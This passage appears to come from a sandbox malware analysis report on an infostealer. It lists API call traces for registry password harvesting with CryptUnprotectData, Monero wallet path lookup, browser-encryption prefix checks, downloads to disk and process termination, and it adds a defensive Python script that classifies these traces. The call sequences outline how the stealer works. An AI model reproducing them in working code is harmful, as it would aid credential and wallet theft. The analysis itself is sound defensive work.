                                • Instruction ID: 97f141fb64b6157da2d4bcd123f63005d47b3faf910fc304831325a89eac7bd8
                                • Opcode Fuzzy Hash: 607c7df0bdbb6dadc436b5389b16f0dcb38db2648733ec010df5a325607a4da1
                                • Instruction Fuzzy Hash: 1F41B47191011C9FCB65EB64DC88ADD73B4FF48310F0489A4F51AA3252DB30AF859F90
                                APIs
                                  • Part of subcall function 00C777D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C77805
                                  • Part of subcall function 00C777D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00C7784A
                                  • Part of subcall function 00C777D0: StrStrA.SHLWAPI(?,Password), ref: 00C778B8
                                  • Part of subcall function 00C777D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C778EC
                                  • Part of subcall function 00C777D0: HeapFree.KERNEL32(00000000), ref: 00C778F3
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C77A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00C77ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00C77ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00C77AF0
                                • wsprintfA.USER32 ref: 00C77B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C77B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C77B47
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C77B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: b2855538a2e0139fb3d8875f221aef9382992f3add9b5919238d910cf4c59b93
                                • Instruction ID: 5a7e202a6b01bf6e740698e9a2b828c59a03104640f29a2c6c0ee09913b2816c
                                • Opcode Fuzzy Hash: b2855538a2e0139fb3d8875f221aef9382992f3add9b5919238d910cf4c59b93
                                • Instruction Fuzzy Hash: 7F31D876A00218EFCB10DB65DD849AFB779FB89314B158669E509A3200DB70FD05DB90
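                                 The call listings above for the screen-capture routine (GetDesktopWindow, GetWindowRect, SelectObject and GetHGlobalFromStream at 00C94280..00C94336), the WinINet download-to-disk routine (00C76B2C..00C76C21) and the registry credential routine at 00C777D0 (RegOpenKeyExA, RegEnumValueA, StrStrA on "Password", with CryptUnprotectData in its subcall) are easier to read once the numeric arguments are decoded and the call order is matched against known stealer behaviours. The following Python is an added example for this page; it is not part of the Joe Sandbox report or of Joe Sandbox itself. The capability labels and call sequences are the example's own assumptions, the constant tables are standard Windows SDK values, and the two traces at the bottom are constructed from the call lines printed in this report.

```python
import re
from dataclasses import dataclass

# One call entry as the report prints it: "api.MODULE(args), ref: addr".
# Subcall entries carry a "Part of subcall function XXXX:" prefix.
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple   # argument tokens as printed; "?" means the sandbox could not resolve it
    ref: int      # call-site address


def parse_calls(text: str) -> list:
    """Parse every call line of one function listing; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            raw = (m.group("args") or "").strip()
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def to_int(token: str):
    """The report prints 32-bit values in hex, with a minus sign when bit 31 is set."""
    if not re.fullmatch(r"-?[0-9A-Fa-f]+", token):
        return None
    return int(token, 16) & 0xFFFFFFFF


# Windows SDK constants for the argument positions worth reading in this report.
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS",
               5: "TRUNCATE_EXISTING"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY"}


def decode_flags(value: int, table: dict) -> str:
    """Name the bits set in a flag word; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value
    for bit in table:
        rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names)


# (api, argument index) -> decoder for that position
DECODERS = {
    ("CreateFileA", 1): lambda v: decode_flags(v, ACCESS),
    ("CreateFileA", 4): DISPOSITION.get,
    ("RegOpenKeyExA", 0): HKEYS.get,
    ("RegOpenKeyExA", 3): REG_SAM.get,
    ("SHGetFolderPathA", 1): CSIDL.get,
    ("InternetOpenA", 1): OPEN_TYPE.get,
}


def decode(call: Call) -> dict:
    """Symbolic names for the decodable argument positions of one call."""
    out = {}
    for (api, idx), fn in DECODERS.items():
        if api == call.api and idx < len(call.args):
            value = to_int(call.args[idx])
            if value is not None:
                out[idx] = fn(value) or f"0x{value:X}"
    return out


# Ordered call sequences (other calls may be interleaved); the second element is an
# optional substring that must appear in the printed arguments. These labels and
# sequences are this example's assumptions, not a Joe Sandbox feature.
SIGNATURES = {
    "screenshot_to_memory": (("GetDesktopWindow", None), ("GetWindowRect", None),
                             ("SelectObject", None), ("GetHGlobalFromStream", None)),
    "download_to_disk": (("InternetOpenUrlA", None), ("CreateFileA", None),
                         ("InternetReadFile", None), ("WriteFile", None)),
    "registry_credential_harvest": (("RegOpenKeyExA", None), ("RegEnumValueA", None),
                                    ("StrStrA", "Password"), ("CryptUnprotectData", None)),
}


def matches(calls: list, pattern: tuple) -> bool:
    """Greedy in-order subsequence match of pattern against the call list."""
    it = iter(calls)
    return all(any(c.api == api and (needle is None or needle in " ".join(c.args))
                   for c in it) for api, needle in pattern)


def classify(calls: list) -> list:
    return sorted(name for name, pat in SIGNATURES.items() if matches(calls, pat))


def triage(text: str) -> dict:
    """Capabilities plus decoded arguments for one function listing."""
    calls = parse_calls(text)
    decoded = {}
    for c in calls:
        d = decode(c)
        if d:
            decoded[f"{c.api}@{c.ref:08X}"] = d
    return {"capabilities": classify(calls), "decoded": decoded}


# Constructed traces: call lines printed in this report for the download routine
# (00C76AFF..00C76C21) and the registry credential routine (00C777D0 and its subcall).
DOWNLOADER_TRACE = """\
• lstrcpy.KERNEL32(00000000,?), ref: 00C76AFF
• InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C76B2C
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00C76B6A
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C76B88
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00C76BA1
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C76BC6
• CloseHandle.KERNEL32(00000000), ref: 00C76C10
"""
CREDENTIAL_TRACE = """\
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C77805
• RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00C7784A
• StrStrA.SHLWAPI(?,Password), ref: 00C778B8
• Part of subcall function 00C77750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C7778D
"""

if __name__ == "__main__":
    for name, trace in (("downloader", DOWNLOADER_TRACE), ("credentials", CREDENTIAL_TRACE)):
        print(name, triage(trace))
```

                                 Running it on the downloader trace reports download_to_disk with CreateFileA decoded as GENERIC_WRITE and CREATE_ALWAYS and InternetOpenA as INTERNET_OPEN_TYPE_DIRECT; the credential trace reports registry_credential_harvest with RegOpenKeyExA on HKEY_CURRENT_USER with KEY_READ. The signed-hex handling matters because the report prints InternetOpenUrlA's flag word as -00800100, which is the 32-bit value 0xFF7FFF00.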
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C8820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88243
                                • lstrlen.KERNEL32(00000000), ref: 00C88260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88297
                                • lstrlen.KERNEL32(00000000), ref: 00C882B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C882EB
                                • lstrlen.KERNEL32(00000000), ref: 00C88308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88337
                                • lstrlen.KERNEL32(00000000), ref: 00C88351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C88380
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 463b8e83eca32122362346b290aac898537c4129e959146ff6f795db6cd6cb6d
                                • Instruction ID: 0734c0689d4556743af8fc47c01c890a2055b6ed70bd171a4d3dd15fe3e92f29
                                • Opcode Fuzzy Hash: 463b8e83eca32122362346b290aac898537c4129e959146ff6f795db6cd6cb6d
                                • Instruction Fuzzy Hash: 2751CB70A002029FDB10EF29D958A6BB7A8EF45700F458524ED16EB655EF30FE54CBE0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C77805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00C7784A
                                • StrStrA.SHLWAPI(?,Password), ref: 00C778B8
                                  • Part of subcall function 00C77750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C7775E
                                  • Part of subcall function 00C77750: RtlAllocateHeap.NTDLL(00000000), ref: 00C77765
                                  • Part of subcall function 00C77750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C7778D
                                  • Part of subcall function 00C77750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00C777AD
                                  • Part of subcall function 00C77750: LocalFree.KERNEL32(?), ref: 00C777B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C778EC
                                • HeapFree.KERNEL32(00000000), ref: 00C778F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00C77A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 8af9731f7da2e8fc1f91b58b5225b3a7804f8f0acae9cf14c44a011f9c9f462f
                                • Instruction ID: 6250a0bf4ea211455a306915dbd8a22a567ab8940c951c0748d904628302b36e
                                • Opcode Fuzzy Hash: 8af9731f7da2e8fc1f91b58b5225b3a7804f8f0acae9cf14c44a011f9c9f462f
                                • Instruction Fuzzy Hash: 3C7130B5D0021DAFDB10DF95DC849DEB7B8EF49300F108569E619A7200EB316E89CF90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00C84F39), ref: 00C94545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9454C
                                • wsprintfW.USER32 ref: 00C9455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00C945CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00C945D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 00C945E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: %hs
                                • API String ID: 885711575-2783943728
                                • Opcode ID: a97072621eaa64871e5987fcdc0cc44aec91f1edfe8579c2b7ac2eb8fcaddb4f
                                • Instruction ID: a613021e01b72c69a265c5727737eeae3b019ef9a8de8b9f5f20a4ae1efeb5c2
                                • Opcode Fuzzy Hash: a97072621eaa64871e5987fcdc0cc44aec91f1edfe8579c2b7ac2eb8fcaddb4f
                                • Instruction Fuzzy Hash: AE315C72A00209BFDB20DBE5DC89FDEB778EF49700F104055FA05A7180EB70AB458BA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C71135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C7113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00C71159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00C71173
                                • RegCloseKey.ADVAPI32(?), ref: 00C7117D
                                Strings
                                • wallet_path, xrefs: 00C7116D
                                • SOFTWARE\monero-project\monero-core, xrefs: 00C7114F
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 1509e9936ed35f75da24986b3fdee20562fe6092e7f2f4323887522e8b7ffbea
                                • Instruction ID: e6d53dc77e707a1863551f71d91968790169081d80bbd7ec7c5762abefdaa3b3
                                • Opcode Fuzzy Hash: 1509e9936ed35f75da24986b3fdee20562fe6092e7f2f4323887522e8b7ffbea
                                • Instruction Fuzzy Hash: 30F06D75A40219BFD7009BA69C8DEAB7B6CEB09755F004054BE05E6281E6B06A4887A0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00C79E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00C79E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00C79EA7
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • lstrcpy.KERNEL32(00000000,00CA4C48), ref: 00C79FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: a3cedefa516e849dca4227e4e2a8cbbcc820efdcd2157a2327195e4e7b8e311c
                                • Instruction ID: 181f96ba54e46a83cc027ec295a35f0cc7fc021baf6065041f99099da4d3e539
                                • Opcode Fuzzy Hash: a3cedefa516e849dca4227e4e2a8cbbcc820efdcd2157a2327195e4e7b8e311c
                                • Instruction Fuzzy Hash: 1351B071A102099BCB10EFA9DC85B9E77B8EF95328F158034F91DEB241DB70EE059B90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C7565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C75661
                                • InternetOpenA.WININET(00C9CFEC,00000000,00000000,00000000,00000000), ref: 00C75677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00C75692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00C756BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 00C756E1
                                • InternetCloseHandle.WININET(?), ref: 00C756FA
                                • InternetCloseHandle.WININET(00000000), ref: 00C75701
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: cc15624f5a05dd3987b8f9734ee6b51b57cb07ade86330c898825a5d70f72460
                                • Instruction ID: 69e5dad1dd27bd7fcd0e5a140ef65998bee551a03ec49514aa6b2a89b380fc18
                                • Opcode Fuzzy Hash: cc15624f5a05dd3987b8f9734ee6b51b57cb07ade86330c898825a5d70f72460
                                • Instruction Fuzzy Hash: A2419174A00605EFDB14CF65DD88F9AB7B4FF48300F14C069E918AB291D7B1AD45CB90
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00C94759
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C94769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C9477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C947AB
